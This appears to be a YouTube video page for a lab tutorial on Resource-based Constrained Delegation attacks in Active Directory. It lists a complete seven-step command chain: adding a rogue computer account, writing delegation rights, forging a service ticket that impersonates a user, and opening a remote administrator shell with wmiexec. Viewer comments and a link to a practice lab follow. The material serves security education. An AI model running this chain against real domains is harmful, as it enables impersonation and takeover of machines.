Resource-based Constrained Delegation (RBCD)
ฝัง
- เผยแพร่เมื่อ 30 ก.ย. 2024
- Commands used:
1) crackmapexec ldap 10.0.2.16 -u rbcd -p 'd3l3g@tion!!' -M maq
2) impacket-addcomputer -computer-name 'Test$' -computer-pass 'Test@123!!' -dc-ip 10.0.2.16 'BERSERK.local'/'rbcd':'d3l3g@tion!!'
3) impacket-rbcd -delegate-from 'Test$' -delegate-to 'Win10$' -dc-ip 10.0.2.16 -action 'write' 'BERSERK.local'/'rbcd':'d3l3g@tion!!'
4) impacket-getST -spn 'cifs/Win10.BERSERK.local' -impersonate 'Guts' -dc-ip 10.0.2.16 'BERSERK.local'/'Test$':'Test@123!!'
5)export KRB5CCNAME=Guts.ccache
6) crackmapexec smb 10.0.2.28 --use-kcache
7) impacket-wmiexec -hashes '' BERSERK.local/administrator@10.0.2.28
Feel free to ask any doubts in the comment section.
![4 - [English] You Do (Not) Understand Kerberos Delegation - RBCD](http://i.ytimg.com/vi/vlKwCTvp5_w/mqdefault.jpg)
Pretty good explanation bro, I was stuck on this. Thanks for help
Beautiful video thank you!
VERY SIMPLE AND INFORMATIVE THANK YOU BRO
Really insightful please continue to upload more videos❤️
Thanks for the kind words. If you want to practice these attacks, check out my lab: github.com/AnikateSawhney/Active-Directory-Penetration-Testing-Lab